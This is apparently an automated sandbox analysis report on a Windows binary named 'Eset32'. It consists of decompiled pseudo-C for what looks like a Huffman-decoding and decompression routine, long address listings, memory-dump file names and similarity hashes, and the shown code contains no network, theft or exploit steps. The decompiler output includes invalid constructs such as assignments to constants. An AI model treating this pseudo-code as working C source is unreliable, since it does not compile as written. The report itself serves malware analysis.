                                                          														 *(__ebp - 8) = 3;
                                                          													} else {
                                                          														_push(7);
                                                          														 *(__ebp - 8) = 0xb;
                                                          														_pop(__eax);
                                                          													}
                                                          													while(1) {
                                                          														L84:
                                                          														__ecx = __eax + __edx;
                                                          														__eflags = __ebx - __eax + __edx;
                                                          														if(__ebx >= __eax + __edx) {
                                                          															break;
                                                          														}
                                                          														L82:
                                                          														__eflags =  *(__ebp - 0x34);
                                                          														if( *(__ebp - 0x34) == 0) {
                                                          															goto L182;
                                                          														}
                                                          														L83:
                                                          														__ecx =  *(__ebp - 0x38);
                                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          														__ecx = __ebx;
                                                          														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          														__ebx = __ebx + 8;
                                                          														__eflags = __ebx;
                                                          													}
                                                          													L85:
                                                          													__ecx = __edx;
                                                          													__ebx = __ebx - __edx;
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          													__edx =  *(__ebp - 8);
                                                          													__ebx = __ebx - __eax;
                                                          													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          													__ecx = __eax;
                                                          													__eax = __esi[1];
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          													__ecx = __esi[2];
                                                          													__eax = __eax >> 5;
                                                          													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                          													__eax = __eax & 0x0000001f;
                                                          													__eax = __edi + __eax + 0x102;
                                                          													__edi = __edx + __ecx;
                                                          													__eflags = __edx + __ecx - __eax;
                                                          													if(__edx + __ecx > __eax) {
                                                          														goto L9;
                                                          													}
                                                          													L86:
                                                          													__eflags =  *(__ebp - 0x14) - 0x10;
                                                          													if( *(__ebp - 0x14) != 0x10) {
                                                          														L89:
                                                          														__edi = 0;
                                                          														__eflags = 0;
                                                          														L90:
                                                          														__eax = __esi + 0xc + __ecx * 4;
                                                          														do {
                                                          															L91:
                                                          															 *__eax = __edi;
                                                          															__ecx = __ecx + 1;
                                                          															__eax = __eax + 4;
                                                          															__edx = __edx - 1;
                                                          															__eflags = __edx;
                                                          														} while (__edx != 0);
                                                          														__esi[2] = __ecx;
                                                          														continue;
                                                          													}
                                                          													L87:
                                                          													__eflags = __ecx - 1;
                                                          													if(__ecx < 1) {
                                                          														goto L9;
                                                          													}
                                                          													L88:
                                                          													__edi =  *(__esi + 8 + __ecx * 4);
                                                          													goto L90;
                                                          												}
                                                          												L78:
                                                          												__ecx = __edx;
                                                          												__ebx = __ebx - __edx;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          												__ecx = __esi[2];
                                                          												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                          												__esi[2] = __esi[2] + 1;
                                                          											}
                                                          											L94:
                                                          											__eax = __esi[1];
                                                          											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                          											__edi = __eax;
                                                          											__eax = __eax >> 5;
                                                          											__edi = __edi & 0x0000001f;
                                                          											__ecx = 0x101;
                                                          											__eax = __eax & 0x0000001f;
                                                          											__edi = __edi + 0x101;
                                                          											__eax = __eax + 1;
                                                          											__edx = __ebp - 0xc;
                                                          											 *(__ebp - 0x14) = __eax;
                                                          											 &(__esi[0x148]) = __ebp - 4;
                                                          											 *(__ebp - 4) = 9;
                                                          											__ebp - 0x18 =  &(__esi[3]);
                                                          											 *(__ebp - 0x10) = 6;
                                                          											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                          											__eflags =  *(__ebp - 4);
                                                          											if( *(__ebp - 4) == 0) {
                                                          												__eax = __eax | 0xffffffff;
                                                          												__eflags = __eax;
                                                          											}
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L9;
                                                          											} else {
                                                          												L97:
                                                          												__ebp - 0xc =  &(__esi[0x148]);
                                                          												__ebp - 0x10 = __ebp - 0x1c;
                                                          												__eax = __esi + 0xc + __edi * 4;
                                                          												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                          												__eflags = __eax;
                                                          												if(__eax != 0) {
                                                          													goto L9;
                                                          												}
                                                          												L98:
                                                          												__eax =  *(__ebp - 0x10);
                                                          												__eflags =  *(__ebp - 0x10);
                                                          												if( *(__ebp - 0x10) != 0) {
                                                          													L100:
                                                          													__cl =  *(__ebp - 4);
                                                          													 *__esi =  *__esi & 0x00000000;
                                                          													__eflags =  *__esi;
                                                          													__esi[4] = __al;
                                                          													__eax =  *(__ebp - 0x18);
                                                          													__esi[5] =  *(__ebp - 0x18);
                                                          													__eax =  *(__ebp - 0x1c);
                                                          													__esi[4] = __cl;
                                                          													__esi[6] =  *(__ebp - 0x1c);
                                                          													goto L101;
                                                          												}
                                                          												L99:
                                                          												__eflags = __edi - 0x101;
                                                          												if(__edi > 0x101) {
                                                          													goto L9;
                                                          												}
                                                          												goto L100;
                                                          											}
                                                          										case 0xe:
                                                          											goto L9;
                                                          										case 0xf:
                                                          											L175:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__esi[0x26ea] =  *(__ebp - 0x30);
                                                          											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          											__ecx = __esi[0x26ea];
                                                          											__edx = __esi[0x26e9];
                                                          											__eflags = __ecx - __edx;
                                                          											 *(__ebp - 0x30) = __ecx;
                                                          											if(__ecx >= __edx) {
                                                          												__eax = __esi[0x26e8];
                                                          												__eax = __esi[0x26e8] - __ecx;
                                                          												__eflags = __eax;
                                                          											} else {
                                                          												__edx = __edx - __ecx;
                                                          												__eax = __edx - __ecx - 1;
                                                          											}
                                                          											__eflags = __ecx - __edx;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ecx != __edx) {
                                                          												L183:
                                                          												__edi = 0;
                                                          												goto L10;
                                                          											} else {
                                                          												L179:
                                                          												__eax = __esi[0x145];
                                                          												__eflags = __eax - 8;
                                                          												 *__esi = __eax;
                                                          												if(__eax != 8) {
                                                          													L184:
                                                          													0 = 1;
                                                          													goto L10;
                                                          												}
                                                          												goto L180;
                                                          											}
                                                          									}
                                                          								}
                                                          								L181:
                                                          								goto L9;
                                                          							}
                                                          							L70:
                                                          							if( *__edi == __eax) {
                                                          								goto L72;
                                                          							}
                                                          							L71:
                                                          							__esi[2] = __esi[2] & __eax;
                                                          							 *__esi = 0xd;
                                                          							goto L93;
                                                          						}
                                                          					}
                                                          				}
                                                          				L182:
                                                          				_t443 = 0;
                                                          				_t446[0x147] =  *(_t448 - 0x40);
                                                          				_t446[0x146] = _t425;
                                                          				( *(_t448 + 8))[1] = 0;
                                                          				goto L11;
                                                          			}
                                                          0x004066fa
                                                          0x004066fd
                                                          0x00406704
                                                          0x00406709
                                                          0x0040670f
                                                          0x0040671a
                                                          0x0040671a
                                                          0x00406983
                                                          0x00406983
                                                          0x0040698d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406993
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699a
                                                          0x0040699a
                                                          0x0040699e
                                                          0x004069a4
                                                          0x004069a4
                                                          0x004069a7
                                                          0x004069aa
                                                          0x004069b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004069b2
                                                          0x004069d4
                                                          0x004069d4
                                                          0x004069d7
                                                          0x00000000
                                                          0x00000000
                                                          0x004069b4
                                                          0x004069b8
                                                          0x00000000
                                                          0x00000000
                                                          0x004069be
                                                          0x004069be
                                                          0x004069c1
                                                          0x004069c4
                                                          0x004069c9
                                                          0x004069cb
                                                          0x004069ce
                                                          0x004069d1
                                                          0x004069d1
                                                          0x004069d9
                                                          0x004069d9
                                                          0x004069df
                                                          0x004069e2
                                                          0x004069e5
                                                          0x004069e5
                                                          0x004069ec
                                                          0x004069f0
                                                          0x004069f4
                                                          0x004069f7
                                                          0x004069fa
                                                          0x00406a00
                                                          0x00406a05
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a07
                                                          0x00406a1b
                                                          0x00406a1b
                                                          0x00406a1f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a09
                                                          0x00406a0c
                                                          0x00406a0c
                                                          0x00406a13
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a21
                                                          0x00406a21
                                                          0x00406a24
                                                          0x00406a32
                                                          0x00406a38
                                                          0x00406a3d
                                                          0x00406a43
                                                          0x00406a49
                                                          0x00406a4f
                                                          0x00406a56
                                                          0x00406a6a
                                                          0x00406a6a
                                                          0x00407039
                                                          0x00407039
                                                          0x00407039
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406676
                                                          0x00406676
                                                          0x00000000
                                                          0x00406c71
                                                          0x00406c71
                                                          0x00406c75
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c84
                                                          0x00406c84
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406cab
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c89
                                                          0x00406c89
                                                          0x00406c8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c93
                                                          0x00406c93
                                                          0x00406c96
                                                          0x00406c99
                                                          0x00406c9c
                                                          0x00406c9e
                                                          0x00406ca0
                                                          0x00406ca3
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406cad
                                                          0x00406cad
                                                          0x00406cb5
                                                          0x00406cb8
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc2
                                                          0x00406cc5
                                                          0x00406cc7
                                                          0x00406cca
                                                          0x00406ccc
                                                          0x00406ce0
                                                          0x00406ce0
                                                          0x00406ce3
                                                          0x00406cfd
                                                          0x00406cfd
                                                          0x00406d00
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d06
                                                          0x00406d06
                                                          0x00406d09
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406d0f
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406ce5
                                                          0x00406ce8
                                                          0x00406cef
                                                          0x00406cf2
                                                          0x00000000
                                                          0x00406cf2
                                                          0x00406cce
                                                          0x00406cd2
                                                          0x00406cd5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1a
                                                          0x00406d1a
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d41
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1f
                                                          0x00406d1f
                                                          0x00406d23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d34
                                                          0x00406d36
                                                          0x00406d39
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d43
                                                          0x00406d4b
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d53
                                                          0x00406d56
                                                          0x00406d56
                                                          0x00406d58
                                                          0x00406d5c
                                                          0x00406d5f
                                                          0x00406d62
                                                          0x00406d65
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d6b
                                                          0x00406d6b
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d92
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d70
                                                          0x00406d70
                                                          0x00406d74
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d7a
                                                          0x00406d7a
                                                          0x00406d7d
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00406d85
                                                          0x00406d87
                                                          0x00406d8a
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d94
                                                          0x00406d94
                                                          0x00406d9c
                                                          0x00406d9f
                                                          0x00406da2
                                                          0x00406da5
                                                          0x00406da9
                                                          0x00406dac
                                                          0x00406dae
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406dce
                                                          0x00406dce
                                                          0x00406dd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dd7
                                                          0x00406dd7
                                                          0x00406dda
                                                          0x00406de1
                                                          0x00000000
                                                          0x00406de1
                                                          0x00406db6
                                                          0x00406db9
                                                          0x00406dc0
                                                          0x00406dc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406de9
                                                          0x00406de9
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dee
                                                          0x00406dee
                                                          0x00406df2
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfb
                                                          0x00406dfe
                                                          0x00406e01
                                                          0x00406e03
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e12
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e22
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e27
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e2d
                                                          0x00406e2d
                                                          0x00406e30
                                                          0x00406e35
                                                          0x00406e37
                                                          0x00406e3d
                                                          0x00406e3f
                                                          0x00406e54
                                                          0x00406e56
                                                          0x00406e56
                                                          0x00406e41
                                                          0x00406e47
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e4b
                                                          0x00406e58
                                                          0x00406e5c
                                                          0x00406e5f
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e68
                                                          0x00406e6a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e70
                                                          0x00406e70
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e9d
                                                          0x00406ea0
                                                          0x00406ea6
                                                          0x00406eab
                                                          0x00406eb1
                                                          0x00406eb7
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ec5
                                                          0x00406ecb
                                                          0x00406ecb
                                                          0x00406ebe
                                                          0x00406ec0
                                                          0x00406ec2
                                                          0x00406ec2
                                                          0x00406ecd
                                                          0x00406ed3
                                                          0x00406ed5
                                                          0x00406ed8
                                                          0x00406eda
                                                          0x00406ee0
                                                          0x00406ee2
                                                          0x00406ee4
                                                          0x00406ee6
                                                          0x00406ee8
                                                          0x00406eeb
                                                          0x00406ef4
                                                          0x00406ef7
                                                          0x00406ef7
                                                          0x00406eed
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef0
                                                          0x00406eeb
                                                          0x00406ee2
                                                          0x00406ef9
                                                          0x00406efb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406efb
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e80
                                                          0x00406e86
                                                          0x00406e88
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e8a
                                                          0x00406e8a
                                                          0x00406e8c
                                                          0x00406e8e
                                                          0x00406e97
                                                          0x00406e97
                                                          0x00406e90
                                                          0x00406e90
                                                          0x00406e93
                                                          0x00406e93
                                                          0x00406e99
                                                          0x00406e9b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f01
                                                          0x00406f01
                                                          0x00406f06
                                                          0x00406f08
                                                          0x00406f09
                                                          0x00406f0a
                                                          0x00406f0b
                                                          0x00406f11
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1c
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f2e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f33
                                                          0x00406f33
                                                          0x00406f36
                                                          0x00406f39
[Address column residue: 522 entries listing code addresses of the sample between 0x00406681 and 0x00406fef, interleaved with 0x00000000 entries; the surrounding layout of this report view did not survive extraction, so only the address range is kept here.]
                                                          0x00406c59
                                                          0x00406c5c
                                                          0x00406c5c
                                                          0x00406c5f
                                                          0x00406c62
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00000000
                                                          0x00406c6e
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ff2
                                                          0x00406ff2
                                                          0x00406ff8
                                                          0x00406ffe
                                                          0x00407003
                                                          0x00407009
                                                          0x0040700f
                                                          0x00407011
                                                          0x00407014
                                                          0x0040701d
                                                          0x00407023
                                                          0x00407023
                                                          0x00407016
                                                          0x00407018
                                                          0x0040701a
                                                          0x0040701a
                                                          0x00407025
                                                          0x00407027
                                                          0x0040702a
                                                          0x00407065
                                                          0x00407065
                                                          0x00000000
                                                          0x0040702c
                                                          0x0040702c
                                                          0x0040702c
                                                          0x00407032
                                                          0x00407035
                                                          0x00407037
                                                          0x0040706c
                                                          0x0040706e
                                                          0x00000000
                                                          0x0040706e
                                                          0x00000000
                                                          0x00407037
                                                          0x00000000
                                                          0x00406676
                                                          0x00407044
                                                          0x00000000
                                                          0x00407044
                                                          0x00406a58
                                                          0x00406a5a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a5f
                                                          0x00000000
                                                          0x00406a5f
                                                          0x004069a4
                                                          0x00406965
                                                          0x00407049
                                                          0x0040704c
                                                          0x0040704e
                                                          0x00407057
                                                          0x0040705d
                                                          0x00000000

Memory Dump Source
• Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
• Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
• Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
• Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
Uniqueness

Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040711C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                          				signed int _v8;
                                                          				unsigned int _v12;
                                                          				signed int _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				intOrPtr* _v32;
                                                          				signed int* _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				void _v116;
                                                          				signed int _v176;
                                                          				signed int _v180;
                                                          				signed int _v240;
                                                          				signed int _t166;
                                                          				signed int _t168;
                                                          				intOrPtr _t175;
                                                          				signed int _t181;
                                                          				void* _t182;
                                                          				intOrPtr _t183;
                                                          				signed int* _t184;
                                                          				signed int _t186;
                                                          				signed int _t187;
                                                          				signed int* _t189;
                                                          				signed int _t190;
                                                          				intOrPtr* _t191;
                                                          				intOrPtr _t192;
                                                          				signed int _t193;
                                                          				signed int _t195;
                                                          				signed int _t200;
                                                          				signed int _t205;
                                                          				void* _t207;
                                                          				short _t208;
                                                          				signed char _t222;
                                                          				signed int _t224;
                                                          				signed int _t225;
                                                          				signed int* _t232;
                                                          				signed int _t233;
                                                          				signed int _t234;
                                                          				void* _t235;
                                                          				signed int _t236;
                                                          				signed int _t244;
                                                          				signed int _t246;
                                                          				signed int _t251;
                                                          				signed int _t254;
                                                          				signed int _t256;
                                                          				signed int _t259;
                                                          				signed int _t262;
                                                          				void* _t263;
                                                          				void* _t264;
                                                          				signed int _t267;
                                                          				intOrPtr _t269;
                                                          				intOrPtr _t271;
                                                          				signed int _t274;
                                                          				intOrPtr* _t275;
                                                          				unsigned int _t276;
                                                          				void* _t277;
                                                          				signed int _t278;
                                                          				intOrPtr* _t279;
                                                          				signed int _t281;
                                                          				intOrPtr _t282;
                                                          				intOrPtr _t283;
                                                          				signed int* _t284;
                                                          				signed int _t286;
                                                          				signed int _t287;
                                                          				signed int _t288;
                                                          				signed int _t296;
                                                          				signed int* _t297;
                                                          				intOrPtr _t298;
                                                          				void* _t299;
                                                          
                                                          				_t278 = _a8;
                                                          				_t187 = 0x10;
                                                          				memset( &_v116, 0, _t187 << 2);
                                                          				_t189 = _a4;
                                                          				_t233 = _t278;
                                                          				do {
                                                          					_t166 =  *_t189;
                                                          					_t189 =  &(_t189[1]);
                                                          					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                          					_t233 = _t233 - 1;
                                                          				} while (_t233 != 0);
                                                          				if(_v116 != _t278) {
                                                          					_t279 = _a28;
                                                          					_t267 =  *_t279;
                                                          					_t190 = 1;
                                                          					_a28 = _t267;
                                                          					_t234 = 0xf;
                                                          					while(1) {
                                                          						_t168 = 0;
                                                          						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                          							break;
                                                          						}
                                                          						_t190 = _t190 + 1;
                                                          						if(_t190 <= _t234) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v8 = _t190;
                                                          					if(_t267 < _t190) {
                                                          						_a28 = _t190;
                                                          					}
                                                          					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                          						_t234 = _t234 - 1;
                                                          						if(_t234 != 0) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v28 = _t234;
                                                          					if(_a28 > _t234) {
                                                          						_a28 = _t234;
                                                          					}
                                                          					 *_t279 = _a28;
                                                          					_t181 = 1 << _t190;
                                                          					while(_t190 < _t234) {
                                                          						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                          						if(_t182 < 0) {
                                                          							L64:
                                                          							return _t168 | 0xffffffff;
                                                          						}
                                                          						_t190 = _t190 + 1;
                                                          						_t181 = _t182 + _t182;
                                                          					}
                                                          					_t281 = _t234 << 2;
                                                          					_t191 = _t299 + _t281 - 0x70;
                                                          					_t269 =  *_t191;
                                                          					_t183 = _t181 - _t269;
                                                          					_v52 = _t183;
                                                          					if(_t183 < 0) {
                                                          						goto L64;
                                                          					}
                                                          					_v176 = _t168;
                                                          					 *_t191 = _t269 + _t183;
                                                          					_t192 = 0;
                                                          					_t235 = _t234 - 1;
                                                          					if(_t235 == 0) {
                                                          						L21:
                                                          						_t184 = _a4;
                                                          						_t271 = 0;
                                                          						do {
                                                          							_t193 =  *_t184;
                                                          							_t184 =  &(_t184[1]);
                                                          							if(_t193 != _t168) {
                                                          								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                          								_t236 =  *_t232;
                                                          								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
                                                          								 *_t232 = _t236 + 1;
                                                          							}
                                                          							_t271 = _t271 + 1;
                                                          						} while (_t271 < _a8);
                                                          						_v16 = _v16 | 0xffffffff;
                                                          						_v40 = _v40 & 0x00000000;
                                                          						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                          						_t195 = _v8;
                                                          						_t186 =  ~_a28;
                                                          						_v12 = _t168;
                                                          						_v180 = _t168;
                                                          						_v36 = 0x42d6a8;
                                                          						_v240 = _t168;
                                                          						if(_t195 > _v28) {
                                                          							L62:
                                                          							_t168 = 0;
                                                          							if(_v52 == 0 || _v28 == 1) {
                                                          								return _t168;
                                                          							} else {
                                                          								goto L64;
                                                          							}
                                                          						}
                                                          						_v44 = _t195 - 1;
                                                          						_v32 = _t299 + _t195 * 4 - 0x70;
                                                          						do {
                                                          							_t282 =  *_v32;
                                                          							if(_t282 == 0) {
                                                          								goto L61;
                                                          							}
                                                          							while(1) {
                                                          								_t283 = _t282 - 1;
                                                          								_t200 = _a28 + _t186;
                                                          								_v48 = _t283;
                                                          								_v24 = _t200;
                                                          								if(_v8 <= _t200) {
                                                          									goto L45;
                                                          								}
                                                          								L31:
                                                          								_v20 = _t283 + 1;
                                                          								do {
                                                          									_v16 = _v16 + 1;
                                                          									_t296 = _v28 - _v24;
                                                          									if(_t296 > _a28) {
                                                          										_t296 = _a28;
                                                          									}
                                                          									_t222 = _v8 - _v24;
                                                          									_t254 = 1 << _t222;
                                                          									if(1 <= _v20) {
                                                          										L40:
                                                          										_t256 =  *_a36;
                                                          										_t168 = 1 << _t222;
                                                          										_v40 = 1;
                                                          										_t274 = _t256 + 1;
                                                          										if(_t274 > 0x5a0) {
                                                          											goto L64;
                                                          										}
                                                          									} else {
                                                          										_t275 = _v32;
                                                          										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                          										if(_t222 >= _t296) {
                                                          											goto L40;
                                                          										}
                                                          										while(1) {
                                                          											_t222 = _t222 + 1;
                                                          											if(_t222 >= _t296) {
                                                          												goto L40;
                                                          											}
                                                          											_t275 = _t275 + 4;
                                                          											_t264 = _t263 + _t263;
                                                          											_t175 =  *_t275;
                                                          											if(_t264 <= _t175) {
                                                          												goto L40;
                                                          											}
                                                          											_t263 = _t264 - _t175;
                                                          										}
                                                          										goto L40;
                                                          									}
                                                          									_t168 = _a32 + _t256 * 4;
                                                          									_t297 = _t299 + _v16 * 4 - 0xec;
                                                          									 *_a36 = _t274;
                                                          									_t259 = _v16;
                                                          									 *_t297 = _t168;
                                                          									if(_t259 == 0) {
                                                          										 *_a24 = _t168;
                                                          									} else {
                                                          										_t276 = _v12;
                                                          										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                          										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                          										_a5 = _a28;
                                                          										_a4 = _t222;
                                                          										_t262 = _t276 >> _t186;
                                                          										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                          										 *(_t298 + _t262 * 4) = _a4;
                                                          									}
                                                          									_t224 = _v24;
                                                          									_t186 = _t224;
                                                          									_t225 = _t224 + _a28;
                                                          									_v24 = _t225;
                                                          								} while (_v8 > _t225);
                                                          								L45:
                                                          								_t284 = _v36;
                                                          								_a5 = _v8 - _t186;
                                                          								if(_t284 < 0x42d6a8 + _a8 * 4) {
                                                          									_t205 =  *_t284;
                                                          									if(_t205 >= _a12) {
                                                          										_t207 = _t205 - _a12 + _t205 - _a12;
                                                          										_v36 =  &(_v36[1]);
                                                          										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                          										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                          									} else {
                                                          										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                          										_t208 =  *_t284;
                                                          										_v36 =  &(_t284[1]);
                                                          									}
                                                          									_a6 = _t208;
                                                          								} else {
                                                          									_a4 = 0xc0;
                                                          								}
                                                          								_t286 = 1 << _v8 - _t186;
                                                          								_t244 = _v12 >> _t186;
                                                          								while(_t244 < _v40) {
                                                          									 *(_t168 + _t244 * 4) = _a4;
                                                          									_t244 = _t244 + _t286;
                                                          								}
                                                          								_t287 = _v12;
                                                          								_t246 = 1 << _v44;
                                                          								while((_t287 & _t246) != 0) {
                                                          									_t287 = _t287 ^ _t246;
                                                          									_t246 = _t246 >> 1;
                                                          								}
                                                          								_t288 = _t287 ^ _t246;
                                                          								_v20 = 1;
                                                          								_v12 = _t288;
                                                          								_t251 = _v16;
                                                          								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                          									L60:
                                                          									if(_v48 != 0) {
                                                          										_t282 = _v48;
                                                          										_t283 = _t282 - 1;
                                                          										_t200 = _a28 + _t186;
                                                          										_v48 = _t283;
                                                          										_v24 = _t200;
                                                          										if(_v8 <= _t200) {
                                                          											goto L45;
                                                          										}
                                                          										goto L31;
                                                          									}
                                                          									break;
                                                          								} else {
                                                          									goto L58;
                                                          								}
                                                          								do {
                                                          									L58:
                                                          									_t186 = _t186 - _a28;
                                                          									_t251 = _t251 - 1;
                                                          								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                          								_v16 = _t251;
